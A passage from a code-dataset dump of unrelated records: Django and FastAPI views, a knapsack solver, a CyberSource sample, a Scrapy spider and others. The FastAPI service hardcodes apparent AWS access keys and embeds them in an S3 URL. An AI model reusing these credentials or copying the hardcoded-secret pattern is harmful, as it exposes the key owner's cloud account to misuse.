import forms\n\n\ndef owner_required(f=None, require_owner=True):\n \"\"\"Requires collection to be owner, by someone.\"\"\"\n\n def decorator(func):\n @functools.wraps(func)\n def wrapper(request, username, slug, *args, **kw):\n collection = get_object_or_404(Collection,\n author__nickname=username,\n slug=slug)\n\n if acl.check_collection_ownership(request, collection,\n require_owner=require_owner):\n return func(request, collection, username, slug, *args, **kw)\n else:\n return http.HttpResponseForbidden(\n _(\"This is not the collection you are looking for.\"))\n return wrapper\n\n if f:\n return decorator(f)\n else:\n return decorator\n\n\ndef legacy_redirect(request, uuid):\n # Nicknames have a limit of 30, so len == 36 implies a uuid.\n key = 'uuid' if len(uuid) == 36 else 'nickname'\n c = get_object_or_404(Collection.objects, **{key: uuid})\n return redirect(c.get_url_path())\n\n\ndef legacy_directory_redirects(request, page):\n sorts = {'editors_picks': 'featured', 'popular': 'popular'}\n loc = base = reverse('collections.list')\n if page in sorts:\n loc = amo.utils.urlparams(base, sort=sorts[page])\n elif request.user.is_authenticated():\n if page == 'mine':\n loc = reverse('collections.user', args=[request.amo_user.nickname])\n elif page == 'favorites':\n loc = reverse('collections.detail',\n args=[request.amo_user.nickname, 'favorites'])\n return redirect(loc)\n\n\nclass CollectionFilter(BaseFilter):\n opts = (('featured', _lazy('Featured')),\n ('popular', _lazy('Popular')),\n ('rating', _lazy('Highest Rated')),\n ('created', _lazy('Recently Added')))\n\n def filter(self, field):\n qs = self.base_queryset\n if field == 'featured':\n return qs.filter(type=amo.COLLECTION_FEATURED)\n elif field == 'followers':\n return qs.order_by('-weekly_subscribers')\n elif field == 'rating':\n return qs.order_by('-rating')\n else:\n return qs.order_by('-created')\n\n\ndef collection_listing(request):\n app = Q(application=request.APP.id) | Q(application=None)\n base = Collection.objects.listed().filter(app)\n filter = CollectionFilter(request, base, key='sort', default='popular')\n collections = amo.utils.paginate(request, filter.qs)\n votes = get_votes(request, collections.object_list)\n return jingo.render(request, 'bandwagon/collection_listing.html',\n {'collections': collections, 'filter': filter,\n 'collection_votes': votes})\n\n\ndef get_votes(request, collections):\n if not request.user.is_authenticated():\n return {}\n q = CollectionVote.objects.filter(\n user=request.amo_user, collection__in=[c.id for c in collections])\n return dict((v.collection_id, v) for v in q)\n\n\ndef user_listing(request, username):\n return http.HttpResponse()\n\n\nclass CollectionAddonFilter(BaseFilter):\n opts = (('added', _lazy('Added')),\n ('popular', _lazy('Popularity')),\n ('name', _lazy('Name')))\n\n def filter(self, field):\n if field == 'added':\n return self.base_queryset.order_by('collectionaddon__created')\n elif field == 'name':\n return order_by_translation(self.base_queryset, 'name')\n elif field == 'popular':\n return (self.base_queryset.order_by('-weekly_downloads')\n .with_index(addons='downloads_type_idx'))\n\n\ndef collection_detail(request, username, slug):\n c = get_object_or_404(Collection.objects,\n author__nickname=username, slug=slug)\n base = c.addons.all() & Addon.objects.listed(request.APP)\n filter = CollectionAddonFilter(request, base,\n key='sort', default='popular')\n notes = get_notes(c)\n count = CollectionAddon.objects.filter(\n Addon.objects.valid_q(prefix='addon__'), collection=c.id).count()\n addons = amo.utils.paginate(request, filter.qs, per_page=15, count=count)\n\n if c.author_id:\n qs = Collection.objects.listed().filter(author=c.author)\n others = amo.utils.randslice(qs, limit=4, exclude=c.id)\n else:\n others = []\n\n perms = {\n 'view_stats': acl.check_ownership(request, c, require_owner=False),\n }\n\n tag_ids = c.top_tags\n tags = Tag.objects.filter(id__in=tag_ids) if tag_ids else []\n return jingo.render(request, 'bandwagon/collection_detail.html',\n {'collection': c, 'filter': filter,\n 'addons': addons, 'notes': notes,\n 'author_collections': others, 'tags': tags,\n 'perms': perms})\n\n\ndef get_notes(collection):\n # This might hurt in a big collection with lots of notes.\n # It's a generator so we don't evaluate anything by default.\n notes = CollectionAddon.objects.filter(collection=collection,\n comments__isnull=False)\n rv = {}\n for note in notes:\n rv[note.addon_id] = note.comments\n yield rv\n\n\n@login_required\ndef collection_vote(request, username, slug, direction):\n c = get_object_or_404(Collection.objects,\n author__nickname=username, slug=slug)\n if request.method != 'POST':\n return redirect(c.get_url_path())\n\n vote = {'up': 1, 'down': -1}[direction]\n cv, new = CollectionVote.objects.get_or_create(\n collection=c, user=request.amo_user, defaults={'vote': vote})\n\n if not new:\n if cv.vote == vote: # Double vote => cancel.\n cv.delete()\n else:\n cv.vote = vote\n cv.save()\n\n if request.is_ajax():\n return http.HttpResponse()\n else:\n return redirect(c.get_url_path())\n\n\ndef initial_data_from_request(request):\n return dict(author=request.amo_user, application_id=request.APP.id)\n\n\n@login_required\ndef add(request):\n \"Displays/processes a form to create a collection.\"\n data = {}\n if request.method == 'POST':\n form = forms.CollectionForm(\n request.POST, request.FILES,\n initial=initial_data_from_request(request))\n aform = forms.AddonsForm(request.POST)\n if form.is_valid():\n collection = form.save()\n\n if aform.is_valid():\n aform.save(collection)\n return http.HttpResponseRedirect(collection.get_url_path())\n else:\n data['addons'] = aform.clean_addon()\n data['comments'] = aform.clean_addon_comment()\n else:\n form = forms.CollectionForm()\n\n data['form'] = form\n return jingo.render(request, 'bandwagon/add.html', data)\n\n\ndef ajax_new(request):\n form = forms.CollectionForm(request.POST or None,\n initial={'author': request.amo_user,\n 'application_id': request.APP.id},\n )\n\n if request.method == 'POST':\n\n if form.is_valid():\n collection = form.save()\n CollectionUser(collection=collection, user=request.amo_user).save()\n addon_id = request.REQUEST['addon_id']\n a = Addon.objects.get(pk=addon_id)\n collection.add_addon(a)\n\n return http.HttpResponseRedirect(reverse('collections.ajax_list')\n + '?addon_id=%s' % addon_id)\n\n return jingo.render(request, 'bandwagon/ajax_new.html', {'form': form})\n\n\n@login_required\ndef ajax_list(request):\n # Get collections associated with this user\n collections = request.amo_user.collections.manual()\n addon_id = int(request.GET['addon_id'])\n\n for collection in collections:\n # See if the collections contains the addon\n if addon_id in collection.addons.values_list('id', flat=True):\n collection.has_addon = True\n\n return jingo.render(request, 'bandwagon/ajax_list.html',\n {'collections': collections})\n\n\ndef _ajax_add_remove(request, op):\n id = request.POST['id']\n addon_id = request.POST['addon_id']\n\n c = Collection.objects.get(pk=id)\n\n if not c.owned_by(request.amo_user):\n return http.HttpResponseForbidden()\n\n a = Addon.objects.get(pk=addon_id)\n\n if op == 'add':\n c.add_addon(a)\n else:\n c.remove_addon(a)\n\n # redirect\n return http.HttpResponseRedirect(reverse('collections.ajax_list') +\n '?addon_id=%s' % addon_id)\n\n\ndef ajax_add(request):\n return _ajax_add_remove(request, 'add')\n\n\ndef ajax_remove(request):\n return _ajax_add_remove(request, 'remove')\n\n\n@login_required\n@owner_required\ndef edit(request, collection, username, slug):\n if request.method == 'POST':\n form = forms.CollectionForm(request.POST, request.FILES,\n initial=initial_data_from_request(request),\n instance=collection)\n if form.is_valid():\n collection = form.save()\n\n return http.HttpResponseRedirect(collection.get_url_path())\n else:\n form = forms.CollectionForm(instance=collection)\n\n data = dict(collection=collection,\n form=form,\n username=username,\n slug=slug)\n return jingo.render(request, 'bandwagon/edit.html', data)\n\n\n@login_required\n@owner_required(require_owner=False)\ndef edit_addons(request, collection, username, slug):\n if request.method == 'POST':\n form = forms.AddonsForm(request.POST)\n if form.is_valid():\n form.save(collection)\n return http.HttpResponseRedirect(collection.get_url_path())\n\n data = dict(collection=collection, username=username, slug=slug)\n return jingo.render(request, 'bandwagon/edit_addons.html', data)\n\n\n@login_required\n@owner_required\ndef edit_contributors(request, collection, username, slug):\n is_admin = acl.action_allowed(request, 'Admin', '%')\n\n data = dict(collection=collection, username=username, slug=slug,\n is_admin=is_admin)\n\n if is_admin:\n initial = dict(type=collection.type,\n application=collection.application_id)\n data['admin_form'] = forms.AdminForm(initial=initial)\n\n if request.method == 'POST':\n if is_admin:\n admin_form = forms.AdminForm(request.POST)\n if admin_form.is_valid():\n admin_form.save(collection)\n\n form = forms.ContributorsForm(request.POST)\n if form.is_valid():\n form.save(collection)\n messages.success(request, _('Your collection has been updated.'))\n if form.cleaned_data['new_owner']:\n return http.HttpResponseRedirect(collection.get_url_path())\n return http.HttpResponseRedirect(\n reverse('collections.edit_contributors',\n args=[username, slug]))\n\n return jingo.render(request, 'bandwagon/edit_contributors.html', data)\n\n\n@login_required\ndef delete(request, username, slug):\n collection = get_object_or_404(Collection, author__nickname=username,\n slug=slug)\n\n is_admin = acl.action_allowed(request, 'Admin', '%')\n\n if not (collection.is_owner(request.amo_user) or is_admin):\n return http.HttpResponseForbidden(\n _('This is not the collection you are looking for.'))\n\n data = dict(collection=collection, username=username, slug=slug,\n is_admin=is_admin)\n\n if request.method == 'POST':\n if request.POST['sure'] == '1':\n collection.delete()\n url = reverse('collections.user', args=[username])\n return http.HttpResponseRedirect(url)\n else:\n return http.HttpResponseRedirect(collection.get_url_path())\n\n return jingo.render(request, 'bandwagon/delete.html', data)\n","sub_path":"apps/bandwagon/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":12727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"370948851","text":"import collections\nfrom django.db.models import fields\nfrom rest_framework import serializers\nfrom core.models import Tag, Collection, Bookmark\n\n\nclass TagSerializer(serializers.ModelSerializer):\n class Meta:\n model = Tag\n fields = '__all__'\n\n\nclass CollectionSerializer(serializers.ModelSerializer):\n class Meta:\n model = Collection\n fields = ['name']\n\n\nclass BookMarkSerializer(serializers.ModelSerializer):\n tags = TagSerializer(many=True)\n collection = CollectionSerializer(many=True)\n class Meta:\n model = Bookmark\n fields = ['title', 'url', 'tags', 'collection']","sub_path":"api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"175934149","text":"import matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport random\r\nimport math\r\nimport time\r\n\r\nnumber = 30\r\ncapacity = 10149\r\nweight = [508,1021,1321,111,1098,1196,204,939,1107,399,474,719,803,1054,1781,\r\n 525,1050,1362,530,641,903,432,583,894,754,806,1241,1056,1092,1545]\r\nprofit = [408,921,1329,11,998,1009,104,839,943,299,374,673,703,954,1657,\r\n 425,950,1375,430,541,971,332,483,815,654,706,1360,956,992,1948]\r\n\r\n#动态规划算法求解0-1背包问题\r\nclass onezerobag:\r\n def __init__(self, w, v, c):\r\n self.w = w\r\n self.v = v\r\n self.c = c\r\n\r\n def dynamic_programming(self):\r\n self.v = np.array(self.v)\r\n self.w = np.array(self.w)\r\n num = self.v.size #物体数量\r\n values = np.zeros([num+1, self.c+1])\r\n for i in range(values.shape[0]):\r\n values[i, 0] = 0\r\n for i in range(values.shape[1]):\r\n values[0, i] = 0\r\n\r\n for i in range(1, values.shape[0], 1):\r\n for j in range(1, values.shape[1], 1):\r\n if(self.w[i - 1] > j): #如果物体重量大于包当前重量,不装进去\r\n values[i,j] = values[i-1, j]\r\n else:\r\n if(values[i-1, j] > values[i-1, j-self.w[i - 1]] + self.v[i - 1]):\r\n values[i,j] = values[i-1, j]\r\n else:\r\n values[i,j] = values[i-1, j-self.w[i - 1]] + self.v[i - 1]\r\n return values\r\n\r\n def load_which(self, values):\r\n h = values.shape[0]\r\n\r\n c = self.c\r\n which = []\r\n\r\n for i in range(h-1, 0, -1):\r\n if(values[i,c] == values[i-1,c]):\r\n continue\r\n else:\r\n which.append(i)\r\n c = c - self.w[i - 1]\r\n which.reverse()\r\n return which, values[values.shape[0]-1, values.shape[1]-1]\r\n\r\n#回溯算法求解0-1背包问题\r\nclass backTrackingMethod:\r\n def __init__(self, w, v, c, cw, cp, bestp):\r\n self.w = np.array(w)\r\n self.v = np.array(v)\r\n self.c = c\r\n self.cw = cw\r\n self.cp = cp\r\n self.bestp = bestp\r\n\r\n def value_per(self):\r\n per = self.v / self.w\r\n sor = np.sort(per)\r\n index = np.argsort(per)\r\n\r\n list = []\r\n for i in sor:\r\n list.append(i)\r\n list.reverse()\r\n\r\n list1 = []\r\n for i in index:\r\n list1.append(i)\r\n list1.reverse()\r\n index = np.array(list1)\r\n\r\n\r\n a = self.v.copy()\r\n b = self.w.copy()\r\n for i in range(self.v.size):\r\n a[i] = self.v[index[i]]\r\n b[i] = self.w[index[i]]\r\n\r\n self.v = a.copy()\r\n self.w = b.copy()\r\n\r\n return self.v, self.w, index\r\n\r\n def bound(self, i):\r\n leftw = self.c - self.cw\r\n bestbound = self.cp\r\n while (i < self.v.size):\r\n if (self.w[i] <= leftw):\r\n bestbound = bestbound + self.v[i]\r\n leftw = leftw - self.w[i]\r\n i += 1\r\n else:\r\n bestbound = bestbound + self.v[i] / self.w[i] * leftw\r\n break\r\n return bestbound\r\n\r\n def back_tracking(self, i, visit):\r\n\r\n if(i > self.v.size-1):\r\n self.bestp = self.cp\r\n return\r\n\r\n if(self.cw + self.w[i] < self.c):\r\n self.cw += self.w[i]\r\n self.cp += self.v[i]\r\n visit[i] = 1\r\n self.back_tracking(i+1, visit)\r\n self.cw -= self.w[i]\r\n self.cp -= self.v[i]\r\n else:\r\n visit[i] = 0\r\n\r\n if(self.bound(i+1) >= self.bestp):\r\n self.back_tracking(i+1, visit)\r\n return visit, self.bestp\r\n\r\n# 用户选择解决0-1背包问题的方法\r\nprint('请选择解决的方法:')\r\nprint('选择动态规划解决请按 1 :')\r\nprint('选择回溯法解决请按 2 :')\r\nprint('请输入你的选项:')\r\nx=input()\r\nif x=='1':\r\n data = open(\"result.txt\", \"w\") # 创建保存结果文件\r\n data.write('\\n背包中所装物品为:') # 写入文件\r\n start = time.time()\r\n question1 = onezerobag(weight, profit, capacity)\r\n x = question1.load_which(question1.dynamic_programming())\r\n end = time.time()\r\n print(\"\\n\\n***动态规划算法***\")\r\n print(\"最优解序号为:\")\r\n for i in x[0]:\r\n print('第',i,'个', end=\" \")\r\n s=str(i) + ' '\r\n data.write(s)\r\n a = x[1]\r\n print(\"\\n最大价值为:\", a)\r\n print(\"\\n循环运行时间:%.2f秒\" % (end - start))\r\n\r\n # 任意一组D{0-1} KP数据的最优解、求解时间和解向量可保存为txt文件或导出EXCEL文件。\r\n data.write(\"\\n循环运行时间:\")\r\n data.write(str(end - start))\r\n data.write(\"秒\")\r\n data.close()\r\nelif x=='2':\r\n data = open(\"result.txt\", \"w\") # 创建保存结果文件\r\n data.write('\\n背包中所装物品为:') # 写入文件\r\n visit = np.zeros(number)\r\n start = time.time()\r\n question = backTrackingMethod(weight, profit, capacity, cw = 0, cp = 0 ,bestp=0)\r\n weight, profit, index = question.value_per()\r\n visit, best = question.back_tracking(0, visit)\r\n end = time.time()\r\n print(\"\\n循环运行时间:%.2f秒\" % (end - start))\r\n list = []\r\n for i in range(visit.size):\r\n if(visit[i] != 0):\r\n list.append(index[i]+1)\r\n print(\"\\n\\n***回溯算法***\")\r\n print(\"最优解序号为:\")\r\n for a in sorted(list):\r\n print('第', a, '个', end=\" \")\r\n s = str(i) + ' '\r\n data.write(s)\r\n print(\"\\n最大价值为:\", best)\r\n # 任意一组D{0-1} KP数据的最优解、求解时间和解向量可保存为txt文件或导出EXCEL文件。\r\n data.write(\"\\n循环运行时间:\")\r\n data.write(str(end - start))\r\n data.write(\"秒\")\r\n data.close()\r\nelse:\r\n print(\"输入错误!\")\r\n\r\n#按性价比进行非递增排序\r\nw_np = np.array(weight)\r\np_np = np.array(profit)\r\nratio = p_np / w_np\r\nprint(\"价值与重量之比:\")\r\nfor a in ratio:\r\n print(format(a, '.3f'), end=\" \")\r\n\r\nprint(\"\\n\\n非递增排序后:\")\r\nres = sorted(ratio, reverse=True)\r\nfor b in res:\r\n print(format(b, '.3f'), end=\" \")\r\n\r\n#绘制散点图\r\nplt.figure(figsize=(8, 6), dpi=80)\r\nplt.scatter(weight, profit, s=20)\r\nplt.xlabel(\"Weight\", fontsize=12, color=\"r\")\r\nplt.ylabel(\"Profit\", fontsize=12, color='r')\r\nplt.show()\r\n","sub_path":"BackTrack.py","file_name":"BackTrack.py","file_ext":"py","file_size_in_byte":6392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"76202626","text":"\n# Import Needed Libraries\nimport uvicorn\nimport pandas as pd\nfrom fastapi import FastAPI,Query\nfrom pydantic import BaseModel\nimport tensorflow as tf\nimport logging\nfrom pathlib import Path\nimport os\nimport numpy as np\nimport boto3\nfrom smart_open import smart_open\nimport tensorflow_text\nfrom typing import List\nfrom fastapi.middleware.cors import CORSMiddleware\n\nimport json\nfrom pydantic import BaseModel\nimport logging\n\n\n\n\n\n# Initiate app instance\napp = FastAPI()\n\norigins = [\n \"http://localhost.tiangolo.com\",\n \"https://localhost.tiangolo.com\",\n \"http://localhost\",\n \"http://localhost:8080\",\n]\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=origins,\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\ndef chunks(lst,n):\n \"\"\"Yield successive n-sized chunks from lst.\"\"\"\n for i in range(0, len(lst), n):\n yield lst[i:i + n]\n\n\n@app.get('/')\ndef root():\n return {'message':'Get Sentiment Predictions'}\n\n@app.get('/download')\ndef download_model():\n s3 = boto3.resource(\n service_name='s3',\n region_name='us-east-2',\n aws_access_key_id='AKIAJV5PIUOIYOJJ3VEQ', aws_secret_access_key='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')\n # select bucket\n local_dir = './Model/'\n bucket_name='prudhvics'\n prefix='model/'\n bucket = s3.Bucket(bucket_name)\n for obj in bucket.objects.filter(Prefix=prefix):\n target = obj.key if local_dir is None \\\n else os.path.join(local_dir, os.path.relpath(obj.key, prefix))\n if not os.path.exists(os.path.dirname(target)):\n os.makedirs(os.path.dirname(target))\n if obj.key[-1] == '/':\n continue\n bucket.download_file(obj.key, target)\n\n# Prediction endpoint\n@app.post('/predict')\ndef get_prediction(data: List[str]= Query(None)):\n data=data\n # Make predictions based on the incoming data and saved neural net\n model_path = './Model/'\n checkpoint = tf.saved_model.load(model_path)\n f = checkpoint.signatures[\"serving_default\"]\n predict = f(tf.constant([data]))\n value = list(predict.values())[0].numpy()\n # print(predict.values())\n value=[item for sublist in value for item in sublist]\n print(value)\n value=[round(float(i),3) for i in value]\n # preds = get_prediction(data)\n print(value)\n # Return the predicted class and the predicted probability\n return {'sentiment':value}\n#\ndef chunks(lst, n):\n \"\"\"Yield successive n-sized chunks from lst.\"\"\"\n for i in range(0, len(lst), n):\n yield lst[i:i + n]\n\n@app.get(\"/get_prediction\")\nasync def get_prediction(s3_url: str):\n\n\n\n aws_access_key_id = 'AKIAJV5PIUOIYOJJ3VEQ'\n aws_secret_access_key = 'LfR3OY+MWpXjZ91yTUK8I0MCmsCTOHzoHgAdGaoQ'\n bucket_name ='prudhvics'\n object_key = s3_url.split('//')[1].replace(bucket_name+'/','')\n path = 's3://{}:{}@{}/{}'.format(aws_access_key_id, aws_secret_access_key, bucket_name, object_key)\n df = pd.read_csv(smart_open(path),sep='\\n')\n df=df.dropna()\n df.columns = ['Text']\n #print(df)\n listtext=list(df[\"Text\"])\n listtext=listtext[:150]\n\n model_path = './Model/'\n checkpoint = tf.saved_model.load(model_path)\n f = checkpoint.signatures[\"serving_default\"]\n\n\n\n\n final_df=pd.DataFrame({\"Text\":[],\"metric\":[]})\n\n for lis in chunks(listtext,200):\n predict = f(tf.constant([lis]))\n value = list(predict.values())[0].numpy()\n #r = requests.post(\"http://localhost:8000/predict\",data=lis)\n #a = json.loads(value)\n copy_df=final_df[final_df[\"Text\"]=='~~~']\n copy_df[\"Text\"]=lis\n copy_df[\"metric\"]=value\n final_df=pd.concat([final_df,copy_df])\n\n #print(final_df)\n return {'Text':list(final_df['Text']),\n 'metric': list(final_df['metric'])}\n\nif __name__ == \"__main__\":\n # Run app with uvicorn with port and host specified. Host needed for docker port mapping\n uvicorn.run(app, port=8000, host=\"0.0.0.0\")\n\n","sub_path":"Assignment4/ModelServingAPI/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"25509353","text":"from CyberSource import *\r\nimport json\r\nimport os\r\nfrom importlib.machinery import SourceFileLoader\r\n\r\nconfig_file = os.path.join(os.getcwd(), \"data\", \"Configuration.py\")\r\nconfiguration = SourceFileLoader(\"module.name\", config_file).load_module()\r\n\r\n\r\ndef authentication_with_new_account():\r\n try:\r\n # Setting the json message body\r\n request = CheckPayerAuthEnrollmentRequest()\r\n client_reference = Riskv1authenticationsClientReferenceInformation(\"New Account\")\r\n request.client_reference_information = client_reference.__dict__\r\n\r\n order_information = Riskv1authenticationsOrderInformation()\r\n\t\t\r\n bill_to = Riskv1authenticationsOrderInformationBillTo(\"1 Market St\",\"Address 2\",\"CA\",\"US\",\"san francisco\",\"James\",\"Doe\",\"4158880000\",\"test@cybs.com\",\"94105\")\r\n\r\n amount_details = Riskv1decisionsOrderInformationAmountDetails(\"USD\")\r\n amount_details.total_amount = \"10.99\"\r\n\r\n order_information.bill_to = bill_to.__dict__\r\n order_information.amount_details = amount_details.__dict__\r\n\r\n payment_info = Riskv1authenticationsPaymentInformation()\r\n card = Riskv1authenticationsPaymentInformationCard(\"001\",\"12\",\"2025\",\"4000990000000004\")\r\n payment_info.card = card.__dict__\r\n request.payment_information = payment_info.__dict__\r\n\r\n request.order_information = order_information.__dict__\r\n\r\n customer_account = Riskv1authenticationsRiskInformationBuyerHistoryCustomerAccount()\r\n customer_account.creation_history = \"NEW_ACCOUNT\"\r\n\r\n account_history = Riskv1authenticationsRiskInformationBuyerHistoryAccountHistory()\r\n account_history.ship_address_usage_date = \"2017-05-06\"\r\n account_history.first_use_of_shipping_address = \"false\"\r\n\r\n buyer_history = Riskv1authenticationsRiskInformationBuyerHistory()\r\n buyer_history.customer_account = customer_account.__dict__\r\n buyer_history.account_history = account_history.__dict__\r\n\r\n risk_information = Riskv1authenticationsRiskInformation()\r\n risk_information.buyer_history = buyer_history.__dict__\r\n\r\n request.risk_information = risk_information.__dict__\r\n\r\n consumer_authentication_information = Riskv1authenticationsConsumerAuthenticationInformation(mcc = '', reference_id = '', transaction_mode = 'MOTO')\r\n\r\n request.consumer_authentication_information = consumer_authentication_information.__dict__\r\n\r\n message_body = json.dumps(request.__dict__)\r\n\r\n # Reading Merchant details from Configuration file\r\n config_obj = configuration.Configuration()\r\n details_dict1 = config_obj.get_configuration()\r\n\r\n dm_obj = PayerAuthenticationApi(details_dict1)\r\n return_data, status, body = dm_obj.check_payer_auth_enrollment(message_body)\r\n print(\"API RESPONSE CODE : \", status)\r\n print(\"API RESPONSE BODY : \", body)\r\n\r\n return return_data\r\n except Exception as e:\r\n print(\"Exception when calling PayerAuthenticationApi->authentication_with_new_account: %s\\n\" % e)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n authentication_with_new_account()\r\n\r\n","sub_path":"samples/payer_authentication/coreservices/authentication_with_new_account.py","file_name":"authentication_with_new_account.py","file_ext":"py","file_size_in_byte":3139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"351932788","text":"\"\"\"\nThese scripts populate the AppTwo database with dummy data using the Faker\nLibrary\n\"\"\"\n\n# NOTE: importing the Django settings must be done before anything else!\nimport os\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'ProTwo.settings')\n\n# NOTE: Sets up the django environment from the above setup settings\nimport django\ndjango.setup()\n\n## FAKE POPULATION SCRIPT\nfrom AppTwo.models import User\nfrom faker import Faker\n\nfakegen = Faker()\n\ndef populate(N=5):\n \"\"\"\n Function to populate database with fake data using the Faker library. The\n user can input the amount of fake data being populated, with the function\n defaulting to 5 iterations.\n\n For each iteration, the function generates fake data using the Faker\n library, and creates a new User entry in the linked database table using\n the get_or_create() method. This method queries the database for the data\n provided in the method's parameters, and if the data is present, it is\n qeuried; if the data is not present, it is inserted as a new entry. The\n data is then returned as a single item tuple.\n \"\"\"\n for entry in range(N):\n # Create the fake data for the entry\n fake_name = fakegen.name().split()\n fake_first_name = fake_name[0]\n fake_last_name = fake_name[1]\n fake_email = fakegen.email()\n\n # Create the new User entry\n user = User.objects.get_or_create(first_name=fake_first_name, last_name=fake_last_name, email=fake_email)[0]\n\n\nif __name__ == '__main__':\n \"\"\"invokes the populate() function with 20 iterations\"\"\"\n print('Populating the data!')\n populate(20)\n print('Populating complete!')","sub_path":"populate_users.py","file_name":"populate_users.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"329783987","text":"# from app.models import Customer, Video\nfrom app.models.video import Video\nfrom app.models.customer import Customer\nfrom app import db\nfrom datetime import timedelta, datetime\n\n# make a new class inheriting from db.Model (the SQLAlchemy object - SQL like singular class names):\nclass Rental(db.Model):\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\n due_date = db.Column(db.DateTime, default=((datetime.now() + timedelta(7))), nullable=False)\n # due_date = db.Column(db.DateTime, nullable=False)\n checked_out = db.Column(db.Boolean, default=False, nullable=False)\n customer_id = db.Column(db.Integer, db.ForeignKey(\"customers.id\")) # ForeignKey refers to the Customer Model Primary Key in the table \"customers\" and column \"id\"\n video_id = db.Column(db.Integer, db.ForeignKey(\"videos.id\")) # ForeignKey refers to the Video Model Primary Key in the table \"videos\" and column \"id\"\n \n customer = db.relationship(\"Customer\", backref=\"rentals\", lazy=\"select\") \n video = db.relationship(\"Video\", backref=\"rentals\", lazy=True) \n\n __tablename__= \"rentals\"\n\n def to_dict(self):\n print(self.video_id)\n\n return {\n \"due_date\": self.due_date, \n \"customer_id\": self.customer_id,\n \"video_id\": self.video_id,\n \"videos_checked_out_count\": self.customer.videos_checked_out_count,\n \"available_inventory\": self.video.available_inventory\n }\n \n\n @classmethod\n def checkout(cls, customer_id, video_id):\n\n customer = Customer.query.get(customer_id)\n video = Video.query.get(video_id)\n\n new_rental = Rental(\n customer_id = customer.id, \n video_id = video.id, \n checked_out = True # switches the rental checked_out column to True\n ) \n\n customer.videos_checked_out_count += 1\n video.available_inventory -= 1\n\n db.session.add(new_rental)\n db.session.commit()\n\n return new_rental\n\n \n def checkin(self):\n\n return {\n \"customer_id\": self.customer_id,\n \"video_id\": self.video_id,\n \"due_date\": self.due_date,\n \"videos_checked_out_count\": self.customer.videos_checked_out_count,\n \"available_inventory\": self.video.available_inventory\n }\n \n\n","sub_path":"app/models/rental.py","file_name":"rental.py","file_ext":"py","file_size_in_byte":2351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"98472035","text":"\n# Create your views here.\nfrom django.shortcuts import render,redirect\nfrom django.contrib import messages\nfrom django.contrib.auth import authenticate,login\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.decorators.csrf import csrf_exempt\nfrom .forms import StoreForm,productStoreForm\nfrom Store.models import Store,productStore\n@login_required\n@csrf_exempt\ndef Store(request):\n if request.method==\"POST\":\n form =StoreForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('index')\n else:\n form =StoreForm()\n # objects=Store.objects.all()\n i=2\n return render(request,\"Store.html\",{'form':form,'i':i})\ndef ProductStore(request):\n if request.method==\"POST\":\n form =productStoreForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('index')\n else:\n form =productStoreForm()\n # objects=productStore.objects.all()\n i=1\n return render(request,\"Store.html\",{'form':form,'i':i})\n \ndef allStore(request):\n category=productStore.objects.all()\n return render(request,\"allstore.html\",{'Products':category})","sub_path":"Store/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"515264171","text":"from django.urls import path\r\nfrom .views import (\r\n home, \r\n listPerson, \r\n listVehicles, \r\n listMovRotarys, \r\n listMovMonthly, \r\n listMonthly,\r\n personRegister,\r\n vehicleRegister,\r\n)\r\n\r\n\r\nurlpatterns = [\r\n path('', home, name='core_home'),\r\n path('persons/', listPerson, name='core_list_person'),\r\n path('persons_register/', personRegister, name='core_person_register'),\r\n path('vehicles/', listVehicles, name='core_list_vehicles'),\r\n path('vehicles_register/', vehicleRegister, name='core_vehicles_register'),\r\n path('rotarys/', listMovRotarys, name='core_list_mov_rotarys'),\r\n path('mov-monthly/', listMovMonthly, name='core_list_mov_monthly'),\r\n path('monthly/', listMonthly, name='core_list_monthly'),\r\n]","sub_path":"core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"456739682","text":"class Solution:\n def productExceptSelf(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[int]\n \"\"\"\n productUntilIndex, product = [], 1\n res = [None] * len(nums)\n for i in range(len(nums)):\n productUntilIndex.append(product)\n product *= nums[i]\n product = 1\n for i in range(len(nums) - 1, -1, -1):\n res[i] = productUntilIndex[i] * product\n product *= nums[i]\n return res\n","sub_path":"amazon/arrays_and_strings/product_of_array_except_self.py","file_name":"product_of_array_except_self.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"650311584","text":"# -*- coding: utf-8 -*-\nimport scrapy\nimport os\nimport csv\n\n\nclass OnlineradioboxSpider(scrapy.Spider):\n name = 'onlineradiobox'\n allowed_domains = ['onlineradiobox.com']\n start_urls = ['https://onlineradiobox.com/']\n\n def parse(self, response):\n links = response.xpath('.//*[@class=\"catalog__mainland-list\"]/li/a/@href').extract()\n for link in links:\n yield scrapy.Request(response.urljoin(link),callback=self.getcountry)\n\n def getcountry(self,response):\n datas = response.xpath('.//*[@class=\"countries__countries-list tab-pane fade in active\"]/li').extract()\n for data in datas:\n sel = scrapy.Selector(text=data)\n link = 